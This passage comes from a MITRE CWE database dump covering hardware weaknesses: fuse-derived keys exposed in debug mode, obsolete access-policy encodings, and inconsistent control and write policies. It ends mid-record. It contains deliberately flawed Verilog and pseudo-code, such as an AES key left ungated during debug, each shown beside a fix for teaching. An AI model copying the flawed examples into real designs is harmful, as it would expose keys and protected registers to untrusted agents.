Several security-sensitive values are programmed into fuses to be used during early-boot flows or later at runtime. Examples of these security-sensitive values include root keys, encryption keys, manufacturing-specific information, chip-manufacturer-specific information, and original-equipment-manufacturer (OEM) data. After the chip is powered on, these values are sensed from fuses and stored in temporary locations such as registers and local memories. These locations are typically access-control protected from untrusted agents capable of accessing them. Even to trusted agents, only read-access is provided. However, these locations are not blocked during debug operations, allowing a user to access this sensitive information.
|
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
},
{
"Class": "Not OS-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Operating_System"
},
{
"Class": "Not Architecture-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Architecture"
},
{
"Class": "Not Technology-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Technology"
}
] | null |
[
{
"Note": null,
"Phase": "Architecture and Design"
},
{
"Note": null,
"Phase": "Implementation"
}
] |
[
{
"Impact": [
"Modify Memory",
"Bypass Protection Mechanism"
],
"Likelihood": null,
"Note": null,
"Scope": [
"Confidentiality",
"Access Control"
]
}
] |
[
{
"Description": "\n\nDisable access to security-sensitive information stored in fuses directly and also reflected from temporary storage locations when in debug mode.\n",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design",
"Implementation"
],
"Strategy": null
}
] | null | null | null |
[
"116",
"545"
] |
[
{
"Authors": null,
"Edition": null,
"ExternalReferenceID": "REF-1366",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": "2021",
"Publisher": null,
"Section": null,
"Title": "aes0_wrapper.sv",
"URL": "https://github.com/HACK-EVENT/hackatdac21/blob/71103971e8204de6a61afc17d3653292517d32bf/piton/design/chip/tile/ariane/src/aes0/aes0_wrapper.sv#L56C1-L57C1",
"URLDate": "2023-07-15"
},
{
"Authors": null,
"Edition": null,
"ExternalReferenceID": "REF-1367",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": "2021",
"Publisher": null,
"Section": null,
"Title": "fix cwe_1243 in aes0_wrapper.sv",
"URL": "https://github.com/HACK-EVENT/hackatdac21/blob/cde1d9d6888bffab21d4b405ccef61b19c58dd3c/piton/design/chip/tile/ariane/src/aes0/aes0_wrapper.sv#L56",
"URLDate": "2023-09-28"
}
] | null |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2020-02-12",
"SubmissionName": "Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi",
"SubmissionOrganization": "Intel Corporation",
"SubmissionReleaseDate": "2020-02-24",
"SubmissionVersion": "4.0",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2020-06-25",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms, Demonstrative_Examples, Description, Name, Potential_Mitigations, Related_Attack_Patterns",
"ModificationDate": "2020-08-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description",
"ModificationDate": "2021-03-15",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2021-07-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2022-10-13",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples, References",
"ModificationDate": "2023-10-26",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": "suggested demonstrative example",
"ContributionDate": "2023-06-21",
"ContributionName": "Chen Chen, Rahul Kande, Jeyavijayan Rajendran",
"ContributionOrganization": "Texas A&M University",
"ContributionReleaseDate": null,
"ContributionType": "Content",
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Contribution",
"Version": null
},
{
"ContributionComment": "suggested demonstrative example",
"ContributionDate": "2023-06-21",
"ContributionName": "Shaza Zeitouni, Mohamadreza Rostami, Ahmad-Reza Sadeghi",
"ContributionOrganization": "Technical University of Darmstadt",
"ContributionReleaseDate": null,
"ContributionType": "Content",
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Contribution",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2020-08-20",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "Exposure of Security-Sensitive Fuse Values During Debug",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "1263",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] | null | null |
[
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "Sensitive manufacturing data (such as die information) are stored in fuses. When the chip powers on, these values are read from the fuses and stored in microarchitectural registers. These registers are only given read access to trusted software running on the core. Untrusted software running on the core is not allowed to access these registers.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\tAll microarchitectural registers in this chip can be accessed through the debug interface. As a result, even an untrusted debugger can access this data and retrieve sensitive manufacturing data.\n```",
"IntroText": null,
"Language": "Other",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\tRegisters used to store sensitive values read from fuses should be blocked during debug. These registers should be disconnected from the debug interface.\n```",
"IntroText": null,
"Language": null,
"Nature": "Good",
"Reference": null
}
],
"ID": null
},
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "The example code below is taken from one of the AES cryptographic accelerators of the HACK@DAC'21 buggy OpenPiton SoC [REF-1366]. The operating system (OS) uses three AES keys to encrypt and decrypt sensitive data using this accelerator. These keys are sensitive data stored in fuses. The security of the OS will be compromised if any of these AES keys are leaked. During system bootup, these AES keys are sensed from fuses and stored in temporary hardware registers of the AES peripheral. Access to these temporary registers is disconnected during the debug state to prevent them from leaking through debug access. In this example (see the vulnerable code source), the registers key0, key1, and key2 are used to store the three AES keys (which are accessed through key_big0, key_big1, and key_big2 signals). The OS selects one of these three keys through the key_big signal, which is used by the AES engine.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "...\n assign key_big0 = debug_mode_i ? 192'b0 : {key0[0],\n key0[1], key0[2], key0[3], key0[4], key0[5]};\n\n assign key_big1 = debug_mode_i ? 192'b0 : {key1[0],\n key1[1], key1[2], key1[3], key1[4], key1[5]};\n\n\n **assign key_big2 = {key2[0], key2[1], key2[2],** \n\n **key2[3], key2[4], key2[5]};** \n ...\n\n **assign key_big = key_sel[1] ? key_big2 : ( key_sel[0] ?** \n\n **key_big1 : key_big0 );** \n ...",
"IntroText": null,
"Language": "Verilog",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "The above code illustrates an instance of a vulnerable implementation for blocking AES key mechanism when the system is in debug mode (i.e., when debug_mode_i is asserted). During debug mode, key accesses through key_big0 and key_big1 are effectively disconnected, as their values are set to zero. However, the key accessed via the key_big2 signal remains accessible, creating a potential pathway for sensitive fuse data leakage, specifically AES key2, during debug mode. Furthermore, even though it is not strictly necessary to disconnect the key_big signal when entering debug mode (since disconnecting key_big0, key_big1, and key_big2 will inherently disconnect key_big), it is advisable, in line with the defense-in-depth strategy, to also sever the connection to key_big. This additional security measure adds an extra layer of protection and safeguards the AES keys against potential future modifications to the key_big logic.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "To mitigate this, disconnect access through key_big2 and key_big during debug mode [REF-1367].",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "...\n assign key_big0 = debug_mode_i ? 192'b0 : {key0[0],\n key0[1], key0[2], key0[3], key0[4], key0[5]};\n\n assign key_big1 = debug_mode_i ? 192'b0 : {key1[0],\n key1[1], key1[2], key1[3], key1[4], key1[5]}; \n\n assign key_big2 = \n **debug_mode_i ? 192'b0 :** {key2[0],\n key2[1], key2[2], key2[3], key2[4], key2[5]};\n ...\n assign key_big = \n **debug_mode_i ? 192'b0 :** ( key_sel[1] ?\n key_big2 : ( key_sel[0] ? key_big1 : key_big0 ) );\n ...",
"IntroText": null,
"Language": "Verilog",
"Nature": "Good",
"Reference": null
}
],
"ID": null
}
] | null | null | null | null | 1
|
[
[
"284",
"1263",
"1243"
]
] |
[] |
1267
|
Policy Uses Obsolete Encoding
|
Base
|
Simple
|
Draft
|
The product uses an obsolete encoding mechanism to implement access controls.
|
Within a System-On-a-Chip (SoC), various circuits and hardware engines generate transactions for the purpose of accessing (read/write) assets or performing various actions (e.g., reset, fetch, compute, etc.). Among various types of message information, a typical transaction is comprised of source identity (identifying the originator of the transaction) and a destination identity (routing the transaction to the respective entity). Sometimes the transactions are qualified with a Security Token. This Security Token helps the destination agent decide on the set of allowed actions (e.g., access to an asset for reads and writes). A policy encoder is used to map the bus transactions to Security Tokens that in turn are used as access-controls/protection mechanisms. A common weakness involves using an encoding which is no longer trusted, i.e., an obsolete encoding.
|
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
},
{
"Class": "Not OS-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Operating_System"
},
{
"Class": "Not Architecture-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Architecture"
},
{
"Class": "Not Technology-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Technology"
}
] | null |
[
{
"Note": null,
"Phase": "Architecture and Design"
},
{
"Note": null,
"Phase": "Implementation"
}
] |
[
{
"Impact": [
"Modify Memory",
"Read Memory",
"Modify Files or Directories",
"Read Files or Directories",
"DoS: Resource Consumption (Other)",
"Execute Unauthorized Code or Commands",
"Gain Privileges or Assume Identity",
"Bypass Protection Mechanism",
"Reduce Reliability"
],
"Likelihood": [
"High"
],
"Note": null,
"Scope": [
"Confidentiality",
"Integrity",
"Availability",
"Access Control"
]
}
] |
[
{
"Description": "\n\nSecurity Token Decoders should be reviewed for design inconsistency and common weaknesses.\n\n\nAccess and programming flows should be tested in both pre-silicon and post-silicon testing.\n",
"Effectiveness": "High",
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design",
"Implementation"
],
"Strategy": null
}
] | null | null | null |
[
"121",
"681"
] |
[
{
"Authors": [
"Brandon Hill"
],
"Edition": null,
"ExternalReferenceID": "REF-1093",
"Publication": null,
"PublicationDay": "02",
"PublicationMonth": "01",
"PublicationYear": "2018",
"Publisher": null,
"Section": null,
"Title": "Huge Intel CPU Bug Allegedly Causes Kernel Memory Vulnerability With Up To 30% Performance Hit In Windows And Linux",
"URL": "https://hothardware.com/news/intel-cpu-bug-kernel-memory-isolation-linux-windows-macos",
"URLDate": "2023-04-07"
}
] | null |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2020-04-18",
"SubmissionName": "Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi",
"SubmissionOrganization": "Intel Corporation",
"SubmissionReleaseDate": "2020-02-24",
"SubmissionVersion": "4.1",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms, Demonstrative_Examples, Description, Modes_of_Introduction, Potential_Mitigations",
"ModificationDate": "2020-08-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Related_Attack_Patterns",
"ModificationDate": "2021-07-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Related_Attack_Patterns",
"ModificationDate": "2022-04-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples",
"ModificationDate": "2022-10-13",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated References, Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "284",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] | null | null |
[
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "For example, consider a system that has four bus masters. The table below provides bus masters, their Security Tokens, and trust assumptions.\n\n| Bus Master | Security Token Decoding | Trust Assumptions | \n| --- | --- | --- |\n| Master_0 | \"00\" | Untrusted |\n| Master_1 | \"01\" | Trusted |\n| Master_2 | \"10\" | Untrusted |\n| Master_3 | \"11\" | Untrusted |\n\n\t\nThe policy encoding is to be defined such that Security Token will be used in implemented access-controls. The bits in the bus transaction that contain Security-Token information are Bus_transaction [15:11]. The assets are the AES-Key registers for encryption or decryption. The key of 128 bits is implemented as a set of four, 32-bit registers.\n\n\t| Register | Field description | \n| --- | --- |\n| AES_ENC_DEC_KEY_0 | AES key [0:31] for encryption or decryption, Default 0x00000000 |\n| AES_ENC_DEC_KEY_1 | AES key [32:63] for encryption or decryption, Default 0x00000000 |\n| AES_ENC_DEC_KEY_2 | AES key [64:95] for encryption or decryption, Default 0x00000000 |\n| AES_ENC_DEC_KEY_4 | AES key [96:127] for encryption or decryption, Default 0x00000000 |\n\n\t\t\nBelow is an example of a policy encoding scheme inherited from a previous project where all \"ODD\" numbered Security Tokens are trusted.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\tIf (Bus_transaction[14] == \"1\")\n\t\tTrusted = \"1\"\n\tElse\n\t\tTrusted = \"0\"\n\tIf (trusted)\n\t\tAllow access to AES-Key registers\n\tElse\n\t\tDeny access to AES-Key registers\n```",
"IntroText": null,
"Language": null,
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "The inherited policy encoding is obsolete and does not work for the new system where an untrusted bus master with an odd Security Token exists in the system, i.e., Master_3 whose Security Token is \"11\". Based on the old policy, the untrusted bus master (Master_3) has access to the AES-Key registers. To resolve this, a register AES_KEY_ACCESS_POLICY can be defined to provide necessary, access controls:",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "New Policy: \n\n| | \n|\n| AES_KEY_ACCESS_POLICY | [31:0] Default 0x00000002 - agent with Security Token \"1\" has access to AES_ENC_DEC_KEY_0 through AES_ENC_DEC_KEY_4 registers |\n\n\t\nThe AES_KEY_ACCESS_POLICY register defines which agents with a Security Token in the transaction can access the AES-key registers. Each bit in this 32-bit register defines a Security Token. There could be a maximum of 32 security Tokens that are allowed access to the AES-key registers. The number of the bit when set (i.e., \"1\") allows respective action from an agent whose identity matches the number of the bit and, if \"0\" (i.e., Clear), disallows the respective action to that corresponding agent. Thus, any bus master with Security Token \"01\" is allowed access to the AES-Key registers. Below is the Pseudo Code for policy encoding:",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\tSecurity_Token[4:0] = Bus_transaction[15:11]\n\tIf (AES_KEY_ACCESS_POLICY[Security_Token] == \"1\")\n\t\tAllow access to AES-Key registers\n\tElse\n\t\tDeny access to AES-Key registers\n```",
"IntroText": null,
"Language": null,
"Nature": "Good",
"Reference": null
}
],
"ID": null
}
] | null | null | null | null | 1
|
[
[
"284",
"1267"
]
] |
[] |
1268
|
Policy Privileges are not Assigned Consistently Between Control and Data Agents
|
Base
|
Simple
|
Draft
|
The product's hardware-enforced access control for a particular resource improperly accounts for privilege discrepancies between control and write policies.
|
Integrated circuits and hardware engines may provide access to resources (device-configuration, encryption keys, etc.) belonging to trusted firmware or software modules (commonly set by a BIOS or a bootloader). These accesses are typically controlled and limited by the hardware. Hardware design access control is sometimes implemented using a policy. A policy defines which entity or agent may or may not be allowed to perform an action. When a system implements multiple levels of policies, a control policy may allow direct access to a resource as well as changes to the policies themselves.
Resources that include agents in their control policy but not in their write policy could unintentionally allow an untrusted agent to insert itself in the write policy register. Inclusion in the write policy register could allow a malicious or misbehaving agent write access to resources. This action could result in security compromises including leaked information, leaked encryption keys, or modification of device configuration.
|
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
},
{
"Class": "Not OS-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Operating_System"
},
{
"Class": "Not Architecture-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Architecture"
},
{
"Class": "Not Technology-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Technology"
}
] | null |
[
{
"Note": "This weakness may be introduced during the design of a device when the architect does not comprehensively specify all of the policies required by an agent.",
"Phase": "Architecture and Design"
},
{
"Note": "This weakness may be introduced during implementation if device policy restrictions do not sufficiently constrain less-privileged clients.",
"Phase": "Implementation"
}
] |
[
{
"Impact": [
"Modify Memory",
"Read Memory",
"DoS: Crash, Exit, or Restart",
"Execute Unauthorized Code or Commands",
"Gain Privileges or Assume Identity",
"Bypass Protection Mechanism",
"Read Files or Directories",
"Reduce Reliability"
],
"Likelihood": [
"High"
],
"Note": null,
"Scope": [
"Confidentiality",
"Integrity",
"Availability",
"Access Control"
]
}
] |
[
{
"Description": "Access-control-policy definition and programming flow must be sufficiently tested in pre-silicon and post-silicon testing.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design",
"Implementation"
],
"Strategy": null
}
] | null | null | null |
[
"180"
] | null |
[
{
"Note": "This entry is still under development and will continue to see updates and content improvements.",
"Type": "Maintenance"
}
] |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2020-02-12",
"SubmissionName": "Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi",
"SubmissionOrganization": "Intel Corporation",
"SubmissionReleaseDate": "2020-02-24",
"SubmissionVersion": "4.1",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples, Description, Modes_of_Introduction, Name, Potential_Mitigations, Related_Attack_Patterns",
"ModificationDate": "2020-08-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations",
"ModificationDate": "2021-10-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Related_Attack_Patterns",
"ModificationDate": "2022-04-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples",
"ModificationDate": "2022-10-13",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
